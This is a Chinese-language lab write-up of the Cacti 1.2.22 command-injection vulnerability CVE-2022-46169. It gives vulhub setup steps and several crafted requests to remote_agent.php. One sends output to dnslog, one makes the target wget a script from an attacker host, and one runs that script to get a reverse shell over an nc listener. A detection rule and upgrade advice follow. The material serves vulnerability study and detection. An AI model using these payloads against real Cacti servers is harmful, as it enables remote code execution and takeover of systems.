Cacti命令执行漏洞(CVE-2022-46169)-0h-漏洞文库小世界-安全文库-NGC660 安全实验室

Cacti命令执行漏洞(CVE-2022-46169)-0h

漏洞概述

Cacti是一套基于PHP,Mysql,SNMP及RRDTool开发的网络流量监控图形分析工具
在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item=POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。

影响版本

Cacti == 1.2.22

利用条件

Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器

环境部署

使用vulhub直接拉取环境

cd vulhub-master/cacti/CVE-2022-46169/
docker-compose up -d 
docker-compose ps 

1677825946225-dda516e0-9308-499c-8132-3c838023dd84
环境启动后,访问靶机的8080端口会跳转到登录页面,创建一个用户名与密码,然后根据页面的提示进行初始化,不断点击“下一步”,直至安装完成即可。
1677826209811-aa9cd95d-636b-4a97-a0be-7753c0ac9723
1677826244512-70867327-2eaa-47ed-84ad-a4ebdc9b40f4
登录Cacti后台首页创建一个新的Graph
1677827281165-0ef68694-1fec-4fb2-aa3e-60557234fda2
创建的Graph Type是“Device – Uptime”
1677827399110-5ca98bbe-99fb-49d2-b0e0-66de8e91a6ea
点击创建
1677827410674-c890c660-2f14-4600-8d28-7f80c0f40031

漏洞复现

burp抓取首页包,构造请求payload实现RCE
POC:

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`要执行的命令` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

这里我选择的是将他的用户名反弹到dnslog上
1678154119795-9855ca51-3a46-4d44-b245-af9d7db83f52
可以看到我们的命令成功执行,当前命令的回显已经反弹到了dnslog上
1678154243529-ba7259fc-b645-4622-8345-4386d1848e01
制作EXP
1678155534847-82c24194-50e7-464a-adb9-de3b268ffdf3
Python搭建HTTP服务

python3 -m http.server 80

让目标去下载恶意文件

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`wget http://192.168.64.129:8080/exp.sh -O /tmp/exp.sh` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

1678154878787-0820013e-e1df-4aac-8b16-c38f8a405cd3
Kali开启监听,执行EXP,拿下shell

nc -lvvp 8888

1678154931872-be8e3a0a-5d58-4ad3-b47e-8a320c9e5cc4

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=;/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`/bin/bash+/tmp/exp.sh` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: 192.168.64.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CactiDateTime=Tue Mar 07 2023 09:49:44 GMT+0800 (ä¸­å›½æ ‡å‡†æ—¶é—´); CactiTimeZone=480; Cacti=5f5a478fc065c3a185f8b52bb3980f8b
Upgrade-Insecure-Requests: 1

1678155469736-605e3fc0-d349-4844-9250-351e583690a7
成功反弹shell
1678155494162-91e0fbc1-a56b-46ea-84ad-113b2ac88e4e

检测POC规则编写

params: []
name: Cacti命令执行漏洞-CVE-2022-46169
set: {}
rules:
- method: GET
  path: /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`whoami`
  headers:
    X-Forwarded-For: 127.0.0.1
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"uptime")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

1678157510868-09240256-359d-477e-a87a-d12fee8142db

修复建议

升级到安全版本
下载链接:

https://github.com/Cacti/cacti/tags
请登录后发表评论

    请登录后查看回复内容